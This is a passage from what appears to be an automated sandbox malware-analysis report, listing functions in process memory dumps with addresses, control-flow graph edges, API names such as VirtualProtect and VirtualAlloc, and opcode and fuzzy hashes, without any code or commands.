7ffd9b7d14e5-7ffd9b7d14ea 174->179 180 7ffd9b7d14ef-7ffd9b7d1527 174->180 175->141 179->141 184 7ffd9b7d1529-7ffd9b7d152e 180->184 185 7ffd9b7d1533-7ffd9b7d156b 180->185 184->141 189 7ffd9b7d1577-7ffd9b7d15af 185->189 190 7ffd9b7d156d-7ffd9b7d1572 185->190 194 7ffd9b7d15bb-7ffd9b7d15c4 189->194 195 7ffd9b7d15b1-7ffd9b7d15b6 189->195 190->141 194->141 195->141
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: O_H
                                                                                                                    • API String ID: 0-1880849852
                                                                                                                    • Opcode ID: 66d71f42813f68f253ab06a6402b25eb3738d64536813b21a6dbadeb4276c28b
                                                                                                                    • Instruction ID: 8a68d62e643a88346b726e614c694c63639c98f3cbe40163828000a9a135472f
                                                                                                                    • Opcode Fuzzy Hash: 66d71f42813f68f253ab06a6402b25eb3738d64536813b21a6dbadeb4276c28b
                                                                                                                    • Instruction Fuzzy Hash: D762B531B1DA5E4BE7A8EB6C84A56B873A2FF94340F0506B9D40EC36F2DD287D858741
                                                                                                                    Function 00007FFD9B7CB4BA Relevance: 1.6, APIs: 1, Instructions: 141memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 197 7ffd9b7cb4ba-7ffd9b7cb4c7 198 7ffd9b7cb4c9-7ffd9b7cb4d1 197->198 199 7ffd9b7cb4d2-7ffd9b7cb4e3 197->199 198->199 200 7ffd9b7cb4e5-7ffd9b7cb4ed 199->200 201 7ffd9b7cb4ee-7ffd9b7cb5ac VirtualProtect 199->201 200->201 205 7ffd9b7cb5b4-7ffd9b7cb5dc 201->205 206 7ffd9b7cb5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 29c540e04edb50e6c73ded193e7089a6907f68db822979333902118ef7ddc2b1
                                                                                                                    • Instruction ID: c3b6827ffa347c9c1be3f4db245461bf5f744de1f75e708fb679e5e46dc019f3
                                                                                                                    • Opcode Fuzzy Hash: 29c540e04edb50e6c73ded193e7089a6907f68db822979333902118ef7ddc2b1
                                                                                                                    • Instruction Fuzzy Hash: 80412C3190C78C4FD7199BA898166F97FE0EF56321F0442AFD099D3293CA746406C792
                                                                                                                    Function 00007FFD9BBB6058 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 242 7ffd9bbb6058-7ffd9bbb6070 244 7ffd9bbb6078-7ffd9bbb60a3 242->244 248 7ffd9bbb60cc-7ffd9bbb60d2 244->248 249 7ffd9bbb60d9-7ffd9bbb60df 248->249 250 7ffd9bbb60a5-7ffd9bbb60be 249->250 251 7ffd9bbb60e1-7ffd9bbb60e6 249->251 254 7ffd9bbb61b5-7ffd9bbb61c5 250->254 255 7ffd9bbb60c4-7ffd9bbb60c9 250->255 252 7ffd9bbb60ec-7ffd9bbb6121 251->252 253 7ffd9bbb5fd3-7ffd9bbb6018 251->253 253->249 258 7ffd9bbb601e-7ffd9bbb6024 253->258 263 7ffd9bbb61c7 254->263 264 7ffd9bbb61c8-7ffd9bbb6216 254->264 255->248 260 7ffd9bbb5fd5-7ffd9bbb61ad 258->260 261 7ffd9bbb6026 258->261 260->254 266 7ffd9bbb604f-7ffd9bbb6056 261->266 263->264 266->242 268 7ffd9bbb6028-7ffd9bbb6041 266->268 268->254 271 7ffd9bbb6047-7ffd9bbb604c 268->271 271->266
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: b2222862df1d5de7718418eb48ab102dbecc96b1f113b22db5c758329952e2e5
                                                                                                                    • Instruction ID: 489f7a90fbe543af2060e3461cc896ed975222ca0659faf49a3bf37fc28a7a30
                                                                                                                    • Opcode Fuzzy Hash: b2222862df1d5de7718418eb48ab102dbecc96b1f113b22db5c758329952e2e5
                                                                                                                    • Instruction Fuzzy Hash: BB515D71E0955E8FDB59DB98C4A05FEB7B1FF58304F1140BAC01AE72E6DA39AA05CB40
                                                                                                                    Function 00007FFD9BBB1008 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 273 7ffd9bbb1008-7ffd9bbb1020 275 7ffd9bbb1028-7ffd9bbb1053 273->275 279 7ffd9bbb107c-7ffd9bbb1082 275->279 280 7ffd9bbb1089-7ffd9bbb108f 279->280 281 7ffd9bbb1055-7ffd9bbb106e 280->281 282 7ffd9bbb1091-7ffd9bbb1096 280->282 283 7ffd9bbb1165-7ffd9bbb1175 281->283 284 7ffd9bbb1074-7ffd9bbb1079 281->284 285 7ffd9bbb109c-7ffd9bbb10d1 282->285 286 7ffd9bbb0f83-7ffd9bbb0fc8 282->286 291 7ffd9bbb1177 283->291 292 7ffd9bbb1178-7ffd9bbb11c6 283->292 284->279 286->280 290 7ffd9bbb0fce-7ffd9bbb0fd4 286->290 293 7ffd9bbb0f85-7ffd9bbb115d 290->293 294 7ffd9bbb0fd6 290->294 291->292 293->283 298 7ffd9bbb0fff-7ffd9bbb1006 294->298 298->273 299 7ffd9bbb0fd8-7ffd9bbb0ff1 298->299 299->283 302 7ffd9bbb0ff7-7ffd9bbb0ffc 299->302 302->298
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: e5e48daf4eb93358cd7f827f4c04bf1939d87f2c89898451a63cb56eda1eb487
                                                                                                                    • Instruction ID: b68ecbcbf9d0bf44b38590d6c066316c8d4dd194cdb520577286235f459fe2bc
                                                                                                                    • Opcode Fuzzy Hash: e5e48daf4eb93358cd7f827f4c04bf1939d87f2c89898451a63cb56eda1eb487
                                                                                                                    • Instruction Fuzzy Hash: 5A517D31E1965E8FDB69DB98C4615BEB7B1FF45304F5141BAD01AE72E2CA342A01CF50
                                                                                                                    Function 00007FFD9B7CC491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 304 7ffd9b7cc491-7ffd9b7cc49d 305 7ffd9b7cc4a1-7ffd9b7cc4dd 304->305 306 7ffd9b7cc49f 304->306 307 7ffd9b7cc4e1-7ffd9b7cc552 VirtualAlloc 305->307 306->305 306->307 310 7ffd9b7cc55a-7ffd9b7cc582 307->310 311 7ffd9b7cc554 307->311 311->310
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: a9092333e41b68e541e5482c024632504f51d8fe71ed918b5106c66deba95a40
                                                                                                                    • Instruction ID: 774ff9e2aacdb946b964fac1b2ebc4baaa213d3aa01f6751ace0e1f8f2a1063c
                                                                                                                    • Opcode Fuzzy Hash: a9092333e41b68e541e5482c024632504f51d8fe71ed918b5106c66deba95a40
                                                                                                                    • Instruction Fuzzy Hash: 64313C31A0CB8C9FDB1DAB6898166F97BF0EF96321F00426FD04AC3653DA646816C7C1
                                                                                                                    Function 00007FFD9B8042BD Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: SD
                                                                                                                    • API String ID: 0-68558722
                                                                                                                    • Opcode ID: eab4d841933ac42f57ad1587b19c711da5d4fc325e0ec2d09cf11b28a9864079
                                                                                                                    • Instruction ID: b58170a3c26bd85f5885e570ee7c86e1b277e222596dd19d4cfbffc8a824ad8c
                                                                                                                    • Opcode Fuzzy Hash: eab4d841933ac42f57ad1587b19c711da5d4fc325e0ec2d09cf11b28a9864079
                                                                                                                    • Instruction Fuzzy Hash: 08114F30B18A094FE798EBAC80A97B976E2FFDC351F15467ED04ED32A2CE34A9454741
                                                                                                                    Function 00007FFD9B7FA529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 328 7ffd9b7fa529-7ffd9b7fa53d 329 7ffd9b7fa53f-7ffd9b7fa55a 328->329 330 7ffd9b7fa55e-7ffd9b7fa563 329->330
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 97d10a51a792739250a071fd6c64afa6d95a0804de66281ebdccd864599b99b4
                                                                                                                    • Instruction ID: f6f9b689a6c39d3a3674ac9d8cd6810dd97dafa44aa53ee499078555cc270e9a
                                                                                                                    • Opcode Fuzzy Hash: 97d10a51a792739250a071fd6c64afa6d95a0804de66281ebdccd864599b99b4
                                                                                                                    • Instruction Fuzzy Hash: AEE06D61A0E7C84FC71AEA348869455BFA0EF6721174A42EEC445CF1A3EA2DC889CB01
                                                                                                                    Function 00007FFD9B7E93E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 331 7ffd9b7e93e9-7ffd9b7e9414 333 7ffd9b7e9418-7ffd9b7e941d 331->333
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7e3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: d0e8cea4f4487dc42e39253ac8781d12e1397dfb5fa8099690c979fee741b53a
                                                                                                                    • Instruction ID: 6ddea67b02c1befec3562bb22ba9eb361fe512d853bfd110c8e7f21324a6500b
                                                                                                                    • Opcode Fuzzy Hash: d0e8cea4f4487dc42e39253ac8781d12e1397dfb5fa8099690c979fee741b53a
                                                                                                                    • Instruction Fuzzy Hash: BDE01A7294E7C48FCB56EB7488698547FA0EF6721078B41EEC189CF1B3E62D9859C701
                                                                                                                    Function 00007FFD9B7E9599 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 334 7ffd9b7e9599-7ffd9b7e95c4 335 7ffd9b7e95c8-7ffd9b7e95cd 334->335
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7e3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 86fdba8bcc8ff6d06c3a8f2be30c41855488a8295957d005536ad367a19cfaa5
                                                                                                                    • Instruction ID: 5741024008ba5ddaf6e81e97e4ed46709f3ceec525961b30a59a7685630887fe
                                                                                                                    • Opcode Fuzzy Hash: 86fdba8bcc8ff6d06c3a8f2be30c41855488a8295957d005536ad367a19cfaa5
                                                                                                                    • Instruction Fuzzy Hash: 2EE01A7154A3C04FCB0AEB7488A98543F70EE6721078A41DEC04ACF1B3E62D8949C701
                                                                                                                    Function 00007FFD9B7F1AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 336 7ffd9b7f1ad9-7ffd9b7f1aed 337 7ffd9b7f1aef-7ffd9b7f1b04 336->337 338 7ffd9b7f1b08-7ffd9b7f1b0d 337->338
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 240cc2e825c508d16e1213a973b643c109c08dacecd2e34d135dbaf9716fc776
                                                                                                                    • Instruction ID: 1f71fe56c67e7093e2e382f7cae8fb2463897a4eb62952b9c44baa99bb1dba6b
                                                                                                                    • Opcode Fuzzy Hash: 240cc2e825c508d16e1213a973b643c109c08dacecd2e34d135dbaf9716fc776
                                                                                                                    • Instruction Fuzzy Hash: 37E0126154F7C44FC716EB7588698557FA0DE6721078B41DEC085CF1B3D61D8849C701
                                                                                                                    Function 00007FFD9B7F7E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 339 7ffd9b7f7e19-7ffd9b7f7e2d 340 7ffd9b7f7e2f-7ffd9b7f7e44 339->340 341 7ffd9b7f7e48-7ffd9b7f7e4d 340->341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 40685a9b3f447d7196ae1bbde28d49a1acb56669e412b342fc7c8109cb04019f
                                                                                                                    • Instruction ID: 1877705ac0316aac4945039b83593623636cfd311d7f17e7d13ecfbd1eea95fb
                                                                                                                    • Opcode Fuzzy Hash: 40685a9b3f447d7196ae1bbde28d49a1acb56669e412b342fc7c8109cb04019f
                                                                                                                    • Instruction Fuzzy Hash: 0DE01A6194F7C44FCB16EB7488698547FA1AE6721078B41EEC185CF1B3E62D8849C701
                                                                                                                    Function 00007FFD9B925678 Relevance: .6, Instructions: 583COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4177267621.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b920000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce7eb88ab9804f724657164fdb1263617b5f350512db142aceab892757c1a69d
                                                                                                                    • Instruction ID: 2468a7b2febfc261cbadf68a689b2539b5802b17909fb403393fad7b3db3346f
                                                                                                                    • Opcode Fuzzy Hash: ce7eb88ab9804f724657164fdb1263617b5f350512db142aceab892757c1a69d
                                                                                                                    • Instruction Fuzzy Hash: 7D2250B1E1DA599FDB98EB1884A5EB8B7E1FBA8300F0441F9D04DD3292DE357981CB41
                                                                                                                    Function 00007FFD9BBB7311 Relevance: .5, Instructions: 482COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 809 7ffd9bbb7311 810 7ffd9bbb7316-7ffd9bbb731e 809->810 811 7ffd9bbb7324-7ffd9bbb7336 call 7ffd9bbb6ce0 810->811 812 7ffd9bbb74a1-7ffd9bbb74b5 810->812 817 7ffd9bbb7338-7ffd9bbb733d 811->817 818 7ffd9bbb7305-7ffd9bbb730c 811->818 813 7ffd9bbb74b7 812->813 814 7ffd9bbb74bc-7ffd9bbb74c7 812->814 813->814 819 7ffd9bbb735f-7ffd9bbb7370 817->819 820 7ffd9bbb733f-7ffd9bbb7343 817->820 821 7ffd9bbb74e0-7ffd9bbb74e5 818->821 824 7ffd9bbb7376-7ffd9bbb738b 819->824 825 7ffd9bbb74ea-7ffd9bbb7505 819->825 822 7ffd9bbb7349-7ffd9bbb735a 820->822 823 7ffd9bbb7443-7ffd9bbb7454 820->823 821->809 822->812 827 7ffd9bbb7456 823->827 828 7ffd9bbb745b-7ffd9bbb7466 823->828 824->825 826 7ffd9bbb7391-7ffd9bbb739d 824->826 833 7ffd9bbb7507 825->833 834 7ffd9bbb750d 825->834 829 7ffd9bbb739f-7ffd9bbb73b6 call 7ffd9bbb57f0 826->829 830 7ffd9bbb73ce-7ffd9bbb73e4 call 7ffd9bbb6ce0 826->830 827->828 829->823 840 7ffd9bbb73bc-7ffd9bbb73cb call 7ffd9bbb5920 829->840 830->823 843 7ffd9bbb73e6-7ffd9bbb73f1 830->843 833->834 837 7ffd9bbb750f 834->837 838 7ffd9bbb7511-7ffd9bbb7573 834->838 837->838 841 7ffd9bbb7551-7ffd9bbb7553 837->841 857 7ffd9bbb753b-7ffd9bbb7577 838->857 858 7ffd9bbb757e-7ffd9bbb759c 838->858 840->830 844 7ffd9bbb7555-7ffd9bbb7570 841->844 845 7ffd9bbb759e-7ffd9bbb75d0 841->845 843->825 848 7ffd9bbb73f7-7ffd9bbb740c 843->848 860 7ffd9bbb76b8-7ffd9bbb76bd 845->860 848->825 849 7ffd9bbb7412-7ffd9bbb7425 848->849 852 7ffd9bbb7427-7ffd9bbb7441 call 7ffd9bbb57f0 849->852 853 7ffd9bbb7479-7ffd9bbb7481 849->853 852->823 866 7ffd9bbb7467-7ffd9bbb7476 call 7ffd9bbb5920 852->866 863 7ffd9bbb7489-7ffd9bbb748c 853->863 857->841 879 7ffd9bbb75ec-7ffd9bbb76c7 860->879 880 7ffd9bbb76d1-7ffd9bbb76ef 860->880 868 7ffd9bbb7493-7ffd9bbb749b 863->868 866->853 868->812 873 7ffd9bbb72da-7ffd9bbb72e7 868->873 873->868 877 7ffd9bbb72ed-7ffd9bbb7301 873->877 877->868 888 7ffd9bbb7616-7ffd9bbb7619 879->888 889 7ffd9bbb769d-7ffd9bbb76b5 879->889 888->889 891 7ffd9bbb761f-7ffd9bbb7622 888->891 889->860 892 7ffd9bbb768b-7ffd9bbb7692 891->892 893 7ffd9bbb7624-7ffd9bbb7651 891->893 894 7ffd9bbb7694-7ffd9bbb769c 892->894 895 7ffd9bbb7652-7ffd9bbb766c 892->895 897 7ffd9bbb76f1-7ffd9bbb7718 895->897 898 7ffd9bbb7672-7ffd9bbb767d 895->898 902 7ffd9bbb7775-7ffd9bbb7828 897->902 903 7ffd9bbb771a-7ffd9bbb7741 call 7ffd9bbb3f30 897->903 898->897 899 7ffd9bbb767f-7ffd9bbb7689 898->899 899->892 922 7ffd9bbb77e7-7ffd9bbb77ea call 7ffd9bbb7832 902->922 923 7ffd9bbb77bd-7ffd9bbb7806 call 7ffd9bbb7832 902->923 927 7ffd9bbb77ef 922->927 929 7ffd9bbb782d-7ffd9bbb7830 927->929 930 7ffd9bbb77f1 929->930 934 7ffd9bbb77f6-7ffd9bbb77fc 930->934
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8184219564e7acb19d00b8df1d0935fb23b83968b531aca6762d1952c08e7ac
                                                                                                                    • Instruction ID: 74f794f5df82d57ee287a29f476781db66baffaac852ac304a5e4938b8858e0b
                                                                                                                    • Opcode Fuzzy Hash: a8184219564e7acb19d00b8df1d0935fb23b83968b531aca6762d1952c08e7ac
                                                                                                                    • Instruction Fuzzy Hash: BDF1E232B0EA1A8FD778CB99C4A157A77A1FF44308B11057EC45EC36E2DE29BA418B41
                                                                                                                    Function 00007FFD9B80020D Relevance: .4, Instructions: 440COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 280adca6f07cdfd5ce2977fb5bc515d5e26ee9580c97190258c72f4dbc8628c0
                                                                                                                    • Instruction ID: 5e64eca5604010061164ae6242ae7fe02b8d0af4c2e25de94556fcf8614439b2
                                                                                                                    • Opcode Fuzzy Hash: 280adca6f07cdfd5ce2977fb5bc515d5e26ee9580c97190258c72f4dbc8628c0
                                                                                                                    • Instruction Fuzzy Hash: F5D14931A1EF4D4FDBA5DB6888659A97BE1EF99340B0501BFD089C72A3DE24AC01C780
                                                                                                                    Function 00007FFD9BBB6267 Relevance: .4, Instructions: 414COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7ae2bbb59dc431e84635d814a1a5c55151289d27dde4d8030e7d0dfc5bc2c5a8
                                                                                                                    • Instruction ID: 05b9e26b457576134c286e18f98b070808182b3fb963cfbfb237fa6e577704d2
                                                                                                                    • Opcode Fuzzy Hash: 7ae2bbb59dc431e84635d814a1a5c55151289d27dde4d8030e7d0dfc5bc2c5a8
                                                                                                                    • Instruction Fuzzy Hash: 71F1C2706199598FEB68CF58C0E06B67BA1FF45304F5145BDC84BCB6DADA38E981CB80
                                                                                                                    Function 00007FFD9BBB1217 Relevance: .4, Instructions: 413COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb95791e9fcae66a270c0e2081d5d2e18b192e0f1b86154bc30f05b8977916f0
                                                                                                                    • Instruction ID: 28c059ded38436ae54e904e934daed55191833bd2f6c4716b7b9dab16ce1ab7b
                                                                                                                    • Opcode Fuzzy Hash: bb95791e9fcae66a270c0e2081d5d2e18b192e0f1b86154bc30f05b8977916f0
                                                                                                                    • Instruction Fuzzy Hash: 3CF1C13062955A8FEB68CF58C4E06B537A1FF45304B5545BDC84BCB6DADA38F982CB80
                                                                                                                    Function 00007FFD9BBB22C1 Relevance: .4, Instructions: 405COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9002f8e8186d8bb32121b94dcb2374931f76070ded939584fa7e7b921fea005e
                                                                                                                    • Instruction ID: 167407165a10d9b91e2b84acc830cfa0bcfcfa8cfa5292d7132f61b4ad079f74
                                                                                                                    • Opcode Fuzzy Hash: 9002f8e8186d8bb32121b94dcb2374931f76070ded939584fa7e7b921fea005e
                                                                                                                    • Instruction Fuzzy Hash: 14D11830B0EA1A4FD379DB98E4A157A7BE1FF44308B11057EC48FC75E2DA29B9428B41
                                                                                                                    Function 00007FFD9B7FF9F0 Relevance: .3, Instructions: 345COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12b24ca9043c0df1a7d1776e04f2e29bc57a9de1e8bd03a64bd34c368228c24e
                                                                                                                    • Instruction ID: eb7814144309c97ab0f095f8e1ea84c086cc8662894f47b455f33bf980298da8
                                                                                                                    • Opcode Fuzzy Hash: 12b24ca9043c0df1a7d1776e04f2e29bc57a9de1e8bd03a64bd34c368228c24e
                                                                                                                    • Instruction Fuzzy Hash: 01910631B2DE0E4FE7A8EB58E4519B5B3D1FF9835071102BAD09DC76A6DD24F8428780
